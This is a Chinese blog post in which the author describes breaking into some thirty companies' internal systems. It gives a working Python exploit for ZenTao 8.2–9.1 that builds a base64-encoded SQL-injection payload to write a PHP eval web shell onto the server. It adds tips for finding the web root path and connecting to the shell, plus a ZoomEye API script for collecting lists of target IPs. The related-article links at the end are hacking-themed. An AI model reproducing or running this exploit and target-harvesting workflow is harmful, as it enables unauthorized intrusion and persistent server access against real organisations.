我是如何在半天内入侵三十家公司内部系统的

最新推荐文章于 2024-05-04 06:51:58 发布
最新推荐文章于 2024-05-04 06:51:58 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: 渗透经验 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carbbage/article/details/111085692
版权

其实具体操作没什么好说的,放一张图,懂得都懂:
在这里插入图片描述禅道的漏洞已经爆出很多年了,但疏于防范的人还是不少,具体原理不再赘述,这里主要放一下利用过程中使用的一些脚本:

#禅道8.2-9.1版本漏洞利用脚本
import binascii
import base64

sql_code="{\"orderBy\":\"order limit 1;SET @SQL=0x*;PREPARE pord FROM @SQL;EXECUTE pord;-- -\",\"num\":\"1,1\",\"type\":\"openedbyme\"}"

def create_payload(url, path):
    shell_code = ("select'<?php eval($_POST[\"HAH\"])>' into outfile'"+path+"test.php'").encode("UTF-8")
    print(str(shell_code))
    asc_code = binascii.hexlify(shell_code).decode("UTF-8")
    sql_new = sql_code.replace("*", asc_code)
    payload = base64.b64encode(sql_new.encode("UTF-8"))
    param = str(payload, "UTF-8")
    print("该禅道应用payload为: \n\033[31m" + url + "/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=" + param)
    print("\033[00m添加refer: \n\033[31m" + url)


if __name__ == '__main__':
    url = input("请输入禅道根网址: ")
    path = input("请输入禅道应用的物理根路径: ")
    path = path.replace("\\", "/")
    create_payload(url,path)

当然可以继续写个批量自动化检测和get shell的脚本,不过手动也有手动的好,而且针对单点攻击也足够了。

1.物理根路径可点击忘记密码获取:
如返回/opt/zentao/www/格式,可直接利用;如返回/opt/zentao/tmp/格式,可将tmp替换为www,尝试写入
2.如一句话木马写入失败,可尝试写入空文本文件,进行找回密码操作,可修改脚本,将shellcode中的句话木马替换为"",目标文件替换为禅道系统提供的随机命名的文本文件,即可继续测试

具体使用截图如下:
在这里插入图片描述访问第一个url,并在header里添加referer头即可,如返回截图如下:
在这里插入图片描述或出现id及乱码字样,则说明漏洞大概率利用成功(如果失败,请检查是否物理根路径输入错误)
接着访问禅道根url+test.php即可一句话连接。

再放一个简单修改过的zoomeye-api的利用脚本:

import urllib.request
import json
import os
local_path = "E:\\zoom-api\\"


def login():
    username = input("username:")
    password = input("password:")
    url = "https://api.zoomeye.org/user/login"
    data = json.dumps({'username': username, 'password': password})
    data_bytes = bytes(data, 'utf8')
    try:
        req = urllib.request.Request(url, data_bytes)
        response = urllib.request.urlopen(req)
        html = response.read().decode('utf-8')
        target = json.loads(html)

        access_token = target['access_token']
        with open('access_token.txt', 'w') as f:
            f.write(access_token)
            f.close
            print('login seccess !!!')
        # print('your access_token is:%s'%(access_token))
    except Exception as err:
        print('[info]:username or password is wrong !')


def resultget(host_or_web, query, file):
    req = urllib.request.Request('https://api.zoomeye.org/%s/search?query=%s' % (host_or_web, query))
    print('https://api.zoomeye.org/%s/search?query=%s' % (host_or_web, query))
    idb = open('access_token.txt').read()
    req.add_header('Authorization', 'JWT %s' % (idb))
    r = urllib.request.urlopen(req)
    a = (r.read().decode('utf-8'))
    print(a)
    a = target = json.loads(a)
    print('tatal:%s' % (a['total']))
    for i in range(len(a['matches'])):
        ip = str(a['matches'][i]['ip']).strip("[\'").strip("\']")
        print(ip)
        file.write(ip + "\n")
    return a['total']


def apiget():
    filename = input("input the filename: ")
    file = open(local_path + filename + ".txt", "a+")
    while True:
        host_or_web = input("search for host or web:(‘q!’Sign out):")
        if host_or_web == 'q':
            break
        query = input("input your keyword(-r for your resources-info):")  # 查看自己的套餐剩余量
        if query == '-r':
            req = urllib.request.Request('https://api.zoomeye.org/resources-info')
            ida = open('access_token.txt').read()

            req.add_header('Authorization', 'JWT %s' % (ida))
            re = urllib.request.urlopen(req)
            ae = (re.read().decode('utf-8'))
            ae = target = json.loads(ae)
            dict_web = ae['resources']['web-search']
            dict_host = ae['resources']['host-search']
            print('your web search:%s' % (dict_web))
            print('your host search:%s' % (dict_host))
        else:
            try:
                total = resultget(host_or_web, query, file)
                #自动搜索完所有结果
                cont = input("Do you want to continue searching?:(a/y/n)[a:自动完成所有, y:手动翻页, n: 停止搜索] ")
                if cont != "n":
                    pages = total//20+1
                    for i in range(2, pages+1):
                        query = query+"&page=" + str(i)
                        resultget(host_or_web, query, file)
                        if cont == 'a':
                            continue
                        cont = input("Do you want to continue searching?:(y/n) ")
                        if cont == "n":
                            break
            except Exception:
                print('[erro]:Please enter the correct syntax !')
    file.close()


def start():
    if not os.path.isfile('access_token.txt'):  # 首次使用会检查脚本目录下access_token.txt文件,没有的话登录会创建
        print('[info]:you need login')
        login()

    apiget()


if __name__ == '__main__':
    start()

zoomeye的api做的真的不好,搜索结果比网页版少了很多,而且反爬机制做的也很严格,建议有条件的同学还是使用shodan的api,直接有第三方库,使用起来更加方便。

出于某些原因,不能放具体的攻击截图,但是一个系统的失陷,已经足以引起内网的滔天巨浪,相关漏洞均已经或即将提交360补天平台或漏洞盒子。

carbbage
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑进腾讯内部系统,攻破论坛服务器,揭晓16岁天才黑客背后的真相
JavaMBa的博客
07-08 2315
他是一名天才黑客 16岁时,黑进腾讯内部系统,攻破亚洲第一论坛天涯论坛的服务器; 17岁时,通过黑客技术救下了一名准备轻生的少女,他就是纵横网络世界、亦正亦邪的超级黑客“菜霸”。 如果说现在的网络社交平台属于微信、抖音、微博,那么15年前的中文互联网只属于一个平台,那就是天涯论坛。 作为当时世界上最大的中文社区,也是中国大陆唯一一个世界500强网站,天涯论坛以其开放、包容的氛围聚集了数量庞大的中国互联网初代网民,也孕育了很多大神和网络传说。 宁财神和他的《武林外传》,当年明月和他的《明朝那
简单的黑客入侵流程
MY_IS_ME的博客
04-18 4849
1.首先在windows上部署一个IIS web服务器 注意将程疗池使用net 4.0并开启net服务, 三级标题 四级标题 五级标题 六级标题
如何一步步攻破一家互联网公司
weixin_34362790的博客
05-26 102
最近在研究Web安全相关的知识,特别是SQL注入类的相关知识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一试还真TM得逞了,内心有些小激动,特在此写博文一篇,来记录下我是如何一步步攻破这家互联网公司的。 【作案工具介绍】 (1)AppScan渗透扫描工具 Appscan是Web应用程序...
你认为黑客入侵很难?其实很简单,黑客养成手册「建议收藏」_入侵别人电脑简单吗
最新发布
2401_84264727的博客
05-04 1211
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享**(安全链接,放心点击)**👈​。
如何通过WIFI渗透企业内网?
代码讲故事
01-26 4046
如何通过WIFI渗透企业内网? 渗透测试的原理在于模拟攻击者对网站进行全面检测和评估,在攻击者之前找到漏洞并且进行修复,从而杜绝网站信息外泄等不安全事件。测试、检查、模拟入侵就是渗透测试。 渗透测试能够通过识别安全问题来帮助一个单位理解当前的安全状况。这使促使许多单位开发操作规划来减少攻击或误用的威胁。渗透测试是一种瞻性的防御措施,可以集中关注与其自身紧密相关的攻击产生的预警和通知,提升真正有意义的安全防护。
系统入侵者攻击企业或敏感数据网络方法白皮书
cjwid的专栏
06-25 1876
 系统入侵者攻击企业或敏感数据网络方法白皮书  网络安全方案公司·FIST工作室(fist@ns2.co.uk) Little Gray Man 译 ----------------------------------------------------------- 目录 ----------------------------------------------------------
会计信息系统内部控制建设.pdf
04-04
虽然我国在2010年发布了《企业内部控制配套指引》并要求上市公司执行,但许多企业在实际操作中并未给予足够的重视。企业领导层需要认识到内控的重要性,将内控制度融入日常管理,避免部门间的职责不明和推诿现象,...
基于业务过程挖掘的内部威胁检测系统
01-14
当前的入侵检测系统更多针对的是外部攻击者,但有时内部人员也会给机构或组织的信息安全带来巨大危害。现有的内部威胁检测方法通常未将人员行为和业务活动进行结合,威胁检测率有待提升。从内部威胁的实施方和威胁对...
毕业设计-基于监督学习的web入侵检测系统源码.zip
05-25
发现陈讲的“在大公司里”百分之八十的时间都在洗数据,卧槽我现在简直是花了百分之九十的时间收集数据,数据清洗的脚本已经写好,数据收集的确麻烦。 SQL注入样本还好,正常请求是火狐插件代理日志中正则匹配出来...
基于监督学习的web入侵检测系统
10-03
##数据方面 发现陈讲的“在大公司里”百分之八十的时间都在洗数据,卧槽我现在简直是花了百分之九十的时间收集数据,数据清洗的脚本已经写好,数据收集的确麻烦。 SQL注入样本还好,正常请求是火狐插件代理日志中正...
在Linux系统下构建Snort入侵检测系统.pdf
09-06
在 Linux 系统下构建 Snort 入侵检测系统 Snort 是一个开源的入侵检测系统(IDS),它可以实时检测网络中的入侵行为,并对其进行响应。Snort 的主要组件包括数据包解析器、检测引擎和日志/警报三个子系统。数据包...
本人自己做的一个公司内部管理系统
04-08
本人自己做的一个公司内部管理系统,给大家参考参考
后台黑站教程
11-06
基础放马,黑站教程,纯属娱乐,若有侵权,请联系删除。
黑/客是怎么入侵电脑的?原来只需要简单几步就可以了
xiangxueerfei的博客
03-01 4342
还记得前段时间肆虐的勒索病毒吗?当时很多人都收到了惊吓——原来电脑那么容易就能被别人控制。技术上的漏洞不用多说了,各种软件漏洞,操作系统漏洞,都能为入侵提供途径。人的漏洞大家往往比较容易忽视。比如利用人贪财好色等特性往你系统里种个木马,诱骗你输入账号密码什么的。或者通过社会工程学方法获得账号密码等。不同的木马有不同的入侵方法,但是黑客就是有办法利用人性的弱点,诱惑你去下载某些“小便宜”,庵后通过木马程序来控制你的主机。
渗透知识-内网渗透(详细版本)
Jian Sun_的博客
02-11 2万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 788
任务环境说明:服务器场景:Server1。
黑客常见的几种入侵方式
2201_75362610的博客
03-10 5415
顾名思义,就是获取到管理员或者用户的账号、密码,进窃取系统信息。获取口令的方法有以下两种:①通过网络监听得到用户口令:这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所用户的账号和口令.对局域网安全威胁比较大。②爆破账号、密码:在获得一个服务器上的用户口令文件Shadow文件后,用暴力破解程序破解用户口令。远程控制是在网络上,由一台计算机远距离去控制另一台计算机的技术。而远程一般是指通过网络控制远端计算机。
黑客6种方法入侵你的计算机系统
weixin_30567225的博客
08-04 6703
  考虑计算机黑客如何入侵计算机系统,其实就是讨论计算机网络是怎样连接的。中国黑客教父,元老,知名网络安全专家,东方联盟创始人郭盛华曾公开表态:“网络世界没有100%的安全,所以杀毒软件可以抵抗大部分的黑客攻击,但不是全部。用户密码尽量不要使用简单单词,也不要同一个密码在多个网站使用。“黑客通常利用以下6种方法入侵你的计算机系统。   1.非法利用系统文件   操作系统设计的漏...
黑客||教你如何进入内网
热门推荐
weixin_40895548的博客
03-04 4万+
经常有人问我这个问题“怎样进入内网”,怎么回答呢,归纳起来就是一句话“突破网关,利用端口重定向进入内网”。首选要突破网关(GetWay),这很容易理解.因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。 突破网关以后,我们的目标就是通过网关上网的192.168.21.75。以后的方法就是在网关力端口重定向,建立包转发。端口重...
公司内部各办公系统安全防护措施
05-25
公司内部各办公系统安全防护措施可能会因公司规模、行业特点以及安全要求的不同而有所差别。以下是一些常见的安全防护措施: 1. 访问控制:使用强密码和多重身份验证,限制用户访问敏感数据和系统。 2. 数据加密...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值